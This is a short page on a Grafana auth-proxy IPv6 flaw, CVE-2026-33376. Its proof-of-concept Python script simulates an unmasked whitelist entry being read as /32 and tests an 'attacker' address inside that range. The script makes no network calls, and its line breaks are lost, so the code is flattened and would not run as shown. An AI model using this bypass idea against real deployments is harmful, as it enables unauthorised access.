CVE-2026-33376 Grafana Auth Proxy IPv6配置缺陷导致访问绕过

#!/usr/bin/env python3 # PoC for CVE-2026-33376: Grafana IPv6 Auth Proxy Misconfiguration # This script demonstrates how a loose /32 mask allows unauthorized IPs. import ipaddress def check_bypass(target_ipv6_config, attacker_ip): """ Simulates the vulnerable logic where unspecified masks default to /32. """ # Vulnerable logic: if no mask is provided, assume /32 if '/' not in target_ipv6_config: vulnerable_network = ipaddress.IPv6Network(f"{target_ipv6_config}/32", strict=False) print(f"[VULNERABLE] Config '{target_ipv6_config}' interpreted as {vulnerable_network}") else: vulnerable_network = ipaddress.IPv6Network(target_ipv6_config, strict=False) print(f"[SAFE] Config '{target_ipv6_config}' interpreted as {vulnerable_network}") attacker = ipaddress.IPv6Address(attacker_ip) if attacker in vulnerable_network: return f"[SUCCESS] Attacker IP {attacker} is ALLOWED by the vulnerable config." else: return f"[FAIL] Attacker IP {attacker} is BLOCKED." if __name__ == "__main__": # Scenario: Admin allows a specific IPv6 address but forgets the mask admin_allowed_ip = "2001:0db8:85a3:0000:0000:8a2e:0370:7334" # Attacker generates a different IP within the same /32 scope attacker_generated_ip = "2001:0db8:ffff:ffff:ffff:ffff:ffff:ffff" print(f"Testing bypass from {attacker_generated_ip} against config {admin_allowed_ip}...") print(check_bypass(admin_allowed_ip, attacker_generated_ip))